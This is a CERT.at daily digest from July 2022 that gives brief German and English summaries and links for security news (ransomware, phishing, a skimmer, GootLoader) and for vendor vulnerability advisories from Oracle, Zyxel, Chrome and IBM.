[CERT-daily] Tageszusammenfassung - 20.07.2022

Daily end-of-shift report team at cert.at
Wed Jul 20 18:51:00 CEST 2022


=====================
= End-of-Day report =
=====================

Timeframe:   Dienstag 19-07-2022 18:00 − Mittwoch 20-07-2022 18:00
Handler:     Michael Schlagenhaufer
Co-Handler:  Stephan Richter

=====================
=       News        =
=====================

∗∗∗ Sicherheitslücken in GPS-Tracker von MiCODUS können Menschenleben gefährden ∗∗∗
---------------------------------------------
Sicherheitsforscher warnen davor, dass Angreifer unter anderem PKWs der Regierung aus der Ferne stoppen könnten. Sicherheitspatches gibt es bislang nicht.
---------------------------------------------
https://heise.de/-7184324


∗∗∗ Phishing-Mail zu „unbefugten Aktivitäten“ ignorieren! ∗∗∗
---------------------------------------------
Aktuell kursiert eine Phishing Nachricht im Namen der Raiffeisen Bank, die nach einer Authentifizierung verlangt. Angeblich wurde eine Zahlung in Höhe von 1259,00 EUR vorgenommen, die blockiert wurde. Achtung: Es handelt sich lediglich um einen erfundenen Grund, mit dem Kriminelle Sie zum Klick auf eine Phishing-Seite bewegen wollen. Löschen Sie die Nachricht einfach!
---------------------------------------------
https://www.watchlist-internet.at/news/phishing-mail-zu-unbefugten-aktivitaeten-ignorieren/


∗∗∗ Breaking down CISs new software supply chain security guidance ∗∗∗
---------------------------------------------
Securing the software supply chain continues to be one of the most discussed topics currently among IT and cybersecurity leaders. A study by In-Q-Tel researchers shows a rapid rise in software supply chain attacks starting around 2016, going from almost none in 2015 to about 1,500 in 2020. The Cloud Native Computing Foundation’s (CNCF’s) catalog of software supply chain attacks also supports a rise in this attack vector.
---------------------------------------------
https://www.csoonline.com/article/3666742/breaking-down-ciss-new-software-supply-chain-security-guidance.html


∗∗∗ Luna and Black Basta — new ransomware for Windows, Linux and ESXi ∗∗∗
---------------------------------------------
This report discusses new ransomware, that targets Windows, Linux and ESXi systems: Luna written in Rust and Black Basta.
---------------------------------------------
https://securelist.com/luna-black-basta-ransomware/106950/


∗∗∗ PrestaShop Skimmer Concealed in One Page Checkout Module ∗∗∗
---------------------------------------------
PrestaShop is a popular freemium open source e-commerce platform used by hundreds of thousands of webmasters to sell products and services to website visitors. While PrestaShop’s CMS market share is only 0.8%, it should still come as no surprise that attackers have been crafting malware to specifically target environments who use this software.
---------------------------------------------
https://blog.sucuri.net/2022/07/prestashop-skimmer-concealed-in-one-page-checkout-module.html


∗∗∗ LockBit: Ransomware Puts Servers in the Crosshairs ∗∗∗
---------------------------------------------
LockBit affiliates using servers to spread ransomware throughout networks.
---------------------------------------------
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockbit-targets-servers


∗∗∗ Analysis of a trojanized jQuery script: GootLoader unleashed ∗∗∗
---------------------------------------------
In this blog post, we will perform a deep analysis into GootLoader, malware which is known to deliver several types of payloads, such as Kronos trojan, REvil, IcedID, GootKit payloads and in this case Cobalt Strike.
---------------------------------------------
https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/


∗∗∗ 4 Strategies for Achieving Greater Visibility in the Cloud ∗∗∗
---------------------------------------------
Here are four ways to put visibility at the center of your cloud security approach and better understand whats going on in your environment.
---------------------------------------------
https://www.rapid7.com/blog/post/2022/07/20/4-strategies-for-achieving-greater-visibility-in-the-cloud/



=====================
=  Vulnerabilities  =
=====================

∗∗∗ Jetzt patchen! Oracle sichert seine Produkte mit 349 Updates ab ∗∗∗
---------------------------------------------
Wichtige Sicherheitspatches schließen unter anderem kritische Lücken in Oracle-Anwendungen.
---------------------------------------------
https://heise.de/-7184179


∗∗∗ Sicherheitsupdates: Root-Lücke bedroht Zyxel-Firewalls ∗∗∗
---------------------------------------------
Mehrere Firewall-Modelle von Zyxel sind über Sicherheitslücken attackierbar.
---------------------------------------------
https://heise.de/-7184526


∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Fedora (golang-github-gosexy-gettext, golang-github-hub, oci-seccomp-bpf-hook, and popub), Oracle (kernel and kernel-container), SUSE (python2-numpy), and Ubuntu (check-mk and pyjwt).
---------------------------------------------
https://lwn.net/Articles/901879/


∗∗∗ Chrome 103 Update Patches High-Severity Vulnerabilities ∗∗∗
---------------------------------------------
Google this week announced a Chrome update that resolves a total of 11 vulnerabilities in the browser, including six reported by external researchers. Of these, five are use-after-free issues, including four that are considered “high severity.”
---------------------------------------------
https://www.securityweek.com/chrome-103-update-patches-high-severity-vulnerabilities


∗∗∗ HCL BigFix: Mehrere Schwachstellen ∗∗∗
---------------------------------------------
Ein entfernter, authentisierter Angreifer kann mehrere Schwachstellen in HCL BigFix ausnutzen, um Sicherheitsvorkehrungen zu umgehen oder Informationen offenzulegen.
---------------------------------------------
https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2022-0733


∗∗∗ OpenJDK: Mehrere Schwachstellen ermöglichen Codeausführung ∗∗∗
---------------------------------------------
Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in OpenJDK ausnutzen, um beliebigen Programmcode auszuführen, Sicherheitsvorkehrungen zu umgehen oder Dateien zu manipulieren.
---------------------------------------------
https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2022-0746


∗∗∗ Arista EOS: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen ∗∗∗
---------------------------------------------
Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Arista EOS ausnutzen, um Sicherheitsvorkehrungen zu umgehen.
---------------------------------------------
https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2022-0761


∗∗∗ Red Hat OpenShift (Logging Subsystem): Schwachstelle ermöglicht Denial of Service ∗∗∗
---------------------------------------------
Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Red Hat OpenShift (Logging Subsystem) ausnutzen, um einen Denial of Service Angriff durchzuführen.
---------------------------------------------
https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2022-0707


∗∗∗ Security Bulletin: IBM Resilient Platform could allow formula injection in Excel (CVE-2020-4633) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-resilient-platform-could-allow-formula-injection-in-excel-cve-2020-4633-3/


∗∗∗ Security Bulletin: IBM InfoSphere Information Analyzer is affected by a cross-site scripting vulnerability in jQuery-UI(CVE-2021-41184) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-infosphere-information-analyzer-is-affected-by-a-cross-site-scripting-vulnerability-in-jquery-uicve-2021-41184/


∗∗∗ Security Bulletin: Multiple cross-site scripting vulnerabilities in JQuery affect IBM InfoSphere Information Server ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-cross-site-scripting-vulnerabilities-in-jquery-affect-ibm-infosphere-information-server/


∗∗∗ Security Bulletin: Apache log4j security vulnerability as it relates to IBM Maximo Scheduler Optimization – Apache Log4j – CVE-2021-45105 (affecting v2.16) and CVE-2021-45046 (affecting v2.15) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-apache-log4j-security-vulnerability-as-it-relates-to-ibm-maximo-scheduler-optimization-apache-log4j-cve-2021-45105-affecting-v2-16-and-cve-2021-45046-affecting-v2-15/


∗∗∗ Security Bulletin: IBM QRadar Network Security is affected by multiple vulnerabilities in Expact library. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-network-security-is-affected-by-multiple-vulnerabilities-in-expact-library/


∗∗∗ Security Bulletin: IBM WebSphere Application Server is vulnerable to Cross-site Scripting (CVE-2022-22477) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-websphere-application-server-is-vulnerable-to-cross-site-scripting-cve-2022-22477-2/


∗∗∗ Security Bulletin: IBM QRadar SIEM is vulnerable to improper certificate validation (CVE-2021-29755) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-siem-is-vulnerable-to-improper-certificate-validation-cve-2021-29755/


∗∗∗ Security Bulletin: IBM QRadar Network Security is affected by multiple vulnerabilities. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-network-security-is-affected-by-multiple-vulnerabilities-3/


∗∗∗ Security Bulletin: IBM QRadar SIEM is vulnerable to infomation disclosured due to incorrect file permissions (CVE-2022-22424) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-siem-is-vulnerable-to-infomation-disclosured-due-to-incorrect-file-permissions-cve-2022-22424/


∗∗∗ Security Bulletin: A vulnerability in IBM Java SDK and IBM Java Runtime affects IBM QRadar SIEM ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-java-sdk-and-ibm-java-runtime-affects-ibm-qradar-siem/


∗∗∗ Security Bulletin: IBM QRadar SIEM is vulnerable to infomarion discosure (CVE-2021-38936) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-siem-is-vulnerable-to-infomarion-discosure-cve-2021-38936/


∗∗∗ Security Bulletin: Vulnerability in Java SE related to the JSSE component affects DB2 Recovery Expert for Linux, Unix and Windows ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-java-se-related-to-the-jsse-component-affects-db2-recovery-expert-for-linux-unix-and-windows/


∗∗∗ Security Bulletin: A security vulnerability in Node.js nconf affects IBM Cloud Pak for Multicloud Management Managed Services ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-in-node-js-nconf-affects-ibm-cloud-pak-for-multicloud-management-managed-services/


∗∗∗ Security Bulletin: IBM Resilient SOAR is Using Components with Known Vulnerabilities – Java SE (CVE-2020-2773) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-resilient-soar-is-using-components-with-known-vulnerabilities-java-se-cve-2020-2773-3/

-- 
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily




More information about the Daily mailing list